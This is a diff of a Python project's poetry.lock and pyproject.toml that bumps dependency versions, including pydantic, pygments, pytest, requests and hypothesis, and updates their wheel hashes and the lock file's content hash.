+    {file = "pydantic_core-2.46.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8a6572f3238851fde28b3194ef98cec9dbe66f1614caf4646239ea87f324121a"},
+    {file = "pydantic_core-2.46.2-cp39-cp39-manylinux_2_31_riscv64.whl", hash = "sha256:b478652b580cd4cf7f2dd40dc9fde594ed1c84e5df4bafefffb8387ddb74049f"},
+    {file = "pydantic_core-2.46.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:7b1c9bdca33968c0dcd875f8185b3b6275df753fe000178684b0c1738959f3cd"},
+    {file = "pydantic_core-2.46.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:e698fe2d8f75c4e9368ee3f4e0d3322d1180be2ec4592d3f73b2572765b1c705"},
+    {file = "pydantic_core-2.46.2-cp39-cp39-musllinux_1_1_armv7l.whl", hash = "sha256:404da669e5e02bf7fb2cc56715a609f63af88aea531287494467109f97865fe3"},
+    {file = "pydantic_core-2.46.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:28708faed0b47f9d68906551a3471421ab0b15c31519e08fdb70ae6cad04d10b"},
+    {file = "pydantic_core-2.46.2-cp39-cp39-win32.whl", hash = "sha256:5e2b4adb0fa46a842c492423e61063d6639cf9aea56380a02630ddcdd4894067"},
+    {file = "pydantic_core-2.46.2-cp39-cp39-win_amd64.whl", hash = "sha256:fa8ab79cea8a1bfe52a21a9b37859c15478d009f242f47737201ecea885b9dd9"},
+    {file = "pydantic_core-2.46.2-graalpy311-graalpy242_311_native-macosx_10_12_x86_64.whl", hash = "sha256:7c5a5b3dbb9e8918e223be6580da5ffcf861c0505bbc196ebed7176ce05b7b4e"},
+    {file = "pydantic_core-2.46.2-graalpy311-graalpy242_311_native-macosx_11_0_arm64.whl", hash = "sha256:bc1e8ce33d5a337f2ba862e0719b8201cd54aaed967406c748e009191d47efdd"},
+    {file = "pydantic_core-2.46.2-graalpy311-graalpy242_311_native-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b737c0b280f41143266445de2689c0e49c79307e51c44ce3a77fef2bedad4994"},
+    {file = "pydantic_core-2.46.2-graalpy311-graalpy242_311_native-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1b877d597afb82b4898e35354bba55de6f7f048421ae0edadbb9886ec137b532"},
+    {file = "pydantic_core-2.46.2-graalpy312-graalpy250_312_native-macosx_10_12_x86_64.whl", hash = "sha256:e9fcabd1857492b5bf16f90258babde50f618f55d046b1309972da2396321ff9"},
+    {file = "pydantic_core-2.46.2-graalpy312-graalpy250_312_native-macosx_11_0_arm64.whl", hash = "sha256:fb3ec2c7f54c07b30d89983ce78dc32c37dd06a972448b8716d609493802d628"},
+    {file = "pydantic_core-2.46.2-graalpy312-graalpy250_312_native-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:130a6c837d819ef33e8c2bf702ed2c3429237ea69807f1140943d6f4bdaf52fa"},
+    {file = "pydantic_core-2.46.2-graalpy312-graalpy250_312_native-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c2e25417cec5cd9bddb151e33cb08c50160f317479ecc02b22a95ec18f8fe004"},
+    {file = "pydantic_core-2.46.2-pp311-pypy311_pp73-macosx_10_12_x86_64.whl", hash = "sha256:c3ad79ed32004d9de91cacd4b5faaff44d56051392fe1d5526feda596f01af25"},
+    {file = "pydantic_core-2.46.2-pp311-pypy311_pp73-macosx_11_0_arm64.whl", hash = "sha256:d157c48d28eebe5d46906de06a6a2f2c9e00b67d3e42de1f1b9c2d42b810f77c"},
+    {file = "pydantic_core-2.46.2-pp311-pypy311_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7b42c6471288dedc979ac8400d9c9770f03967dd187db1f8d3405d4d182cc714"},
+    {file = "pydantic_core-2.46.2-pp311-pypy311_pp73-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:4f27bc4801358dc070d6697b41237fce9923d8e69a1ce1e95606ac36c1552dc1"},
+    {file = "pydantic_core-2.46.2-pp311-pypy311_pp73-musllinux_1_1_aarch64.whl", hash = "sha256:e094a8f85db41aa7f6a45c5dac2950afc9862e66832934231962252b5d284eed"},
+    {file = "pydantic_core-2.46.2-pp311-pypy311_pp73-musllinux_1_1_armv7l.whl", hash = "sha256:807eeda5551f6884d3b4421578be37be50ddb7a58832348e99617a6714a73748"},
+    {file = "pydantic_core-2.46.2-pp311-pypy311_pp73-musllinux_1_1_x86_64.whl", hash = "sha256:fcaa1c3c846a7f6686b38fe493d1b2e8007380e293bfef6a9354563c026cbf36"},
+    {file = "pydantic_core-2.46.2-pp311-pypy311_pp73-win_amd64.whl", hash = "sha256:154dbfdfb11b8cbd8ff4d00d0b81e3d19f4cb4bedd5aa9f091060ba071474c6a"},
+    {file = "pydantic_core-2.46.2.tar.gz", hash = "sha256:37bb079f9ee3f1a519392b73fda2a96379b31f2013c6b467fe693e7f2987f596"},
 ]
 
 [package.dependencies]
@@ -518,14 +517,14 @@ typing-extensions = ">=4.14.1"
 
 [[package]]
 name = "pygments"
-version = "2.19.2"
+version = "2.20.0"
 description = "Pygments is a syntax highlighting package written in Python."
 optional = false
-python-versions = ">=3.8"
+python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "pygments-2.19.2-py3-none-any.whl", hash = "sha256:86540386c03d588bb81d44bc3928634ff26449851e99741617ecb9037ee5ec0b"},
-    {file = "pygments-2.19.2.tar.gz", hash = "sha256:636cb2477cec7f8952536970bc533bc43743542f70392ae026374600add5b887"},
+    {file = "pygments-2.20.0-py3-none-any.whl", hash = "sha256:81a9e26dd42fd28a23a2d169d86d7ac03b46e2f8b59ed4698fb4785f946d0176"},
+    {file = "pygments-2.20.0.tar.gz", hash = "sha256:6757cd03768053ff99f3039c1a36d6c0aa0b263438fcab17520b30a303a82b5f"},
 ]
 
 [package.extras]
@@ -533,14 +532,14 @@ windows-terminal = ["colorama (>=0.4.6)"]
 
 [[package]]
 name = "pytest"
-version = "9.0.2"
+version = "9.0.3"
 description = "pytest: simple powerful testing with Python"
 optional = false
 python-versions = ">=3.10"
 groups = ["main"]
 files = [
-    {file = "pytest-9.0.2-py3-none-any.whl", hash = "sha256:711ffd45bf766d5264d487b917733b453d917afd2b0ad65223959f59089f875b"},
-    {file = "pytest-9.0.2.tar.gz", hash = "sha256:75186651a92bd89611d1d9fc20f0b4345fd827c41ccd5c299a868a05d70edf11"},
+    {file = "pytest-9.0.3-py3-none-any.whl", hash = "sha256:2c5efc453d45394fdd706ade797c0a81091eccd1d6e4bccfcd476e2b8e0ab5d9"},
+    {file = "pytest-9.0.3.tar.gz", hash = "sha256:b86ada508af81d19edeb213c681b1d48246c1a91d304c6c81a427674c17eb91c"},
 ]
 
 [package.dependencies]
@@ -655,25 +654,25 @@ typing-extensions = {version = ">=4.4.0", markers = "python_version < \"3.13\""}
 
 [[package]]
 name = "requests"
-version = "2.32.5"
+version = "2.33.1"
 description = "Python HTTP for Humans."
 optional = false
-python-versions = ">=3.9"
+python-versions = ">=3.10"
 groups = ["main"]
 files = [
-    {file = "requests-2.32.5-py3-none-any.whl", hash = "sha256:2462f94637a34fd532264295e186976db0f5d453d1cdd31473c85a6a161affb6"},
-    {file = "requests-2.32.5.tar.gz", hash = "sha256:dbba0bac56e100853db0ea71b82b4dfd5fe2bf6d3754a8893c3af500cec7d7cf"},
+    {file = "requests-2.33.1-py3-none-any.whl", hash = "sha256:4e6d1ef462f3626a1f0a0a9c42dd93c63bad33f9f1c1937509b8c5c8718ab56a"},
+    {file = "requests-2.33.1.tar.gz", hash = "sha256:18817f8c57c6263968bc123d237e3b8b08ac046f5456bd1e307ee8f4250d3517"},
 ]
 
 [package.dependencies]
-certifi = ">=2017.4.17"
+certifi = ">=2023.5.7"
 charset_normalizer = ">=2,<4"
 idna = ">=2.5,<4"
-urllib3 = ">=1.21.1,<3"
+urllib3 = ">=1.26,<3"
 
 [package.extras]
 socks = ["PySocks (>=1.5.6,!=1.5.7)"]
-use-chardet-on-py3 = ["chardet (>=3.0.2,<6)"]
+use-chardet-on-py3 = ["chardet (>=3.0.2,<8)"]
 
 [[package]]
 name = "rich"
@@ -996,4 +995,4 @@ zstd = ["backports-zstd (>=1.0.0) ; python_version < \"3.14\""]
 [metadata]
 lock-version = "2.1"
 python-versions = "^3.11"
-content-hash = "7415b6dd6c8a42ec54fde12839fc92cf1034c2558090542918aa17eba0a95498"
+content-hash = "7538a0b63553d40b9d3daab57bf4233e0d2d4c9ef72e9055bc3e68a0aec780ee"

pyproject.toml

@@ -9,12 +9,12 @@ readme = "README.md"
 python = "^3.11"
 pyyaml = "^6.0.3"
 jsonschema = "^4.26.0"
-requests = "^2.32.5"
+requests = "^2.33.1"
 ruamel-yaml = "^0.18.16"
-pydantic = "^2.12.5"
+pydantic = "^2.13.2"
 typer = "^0.24.1"
-hypothesis = "^6.151.5"
-pytest = "^9.0.2"
+hypothesis = "^6.152.1"
+pytest = "^9.0.3"
 
 
 [build-system]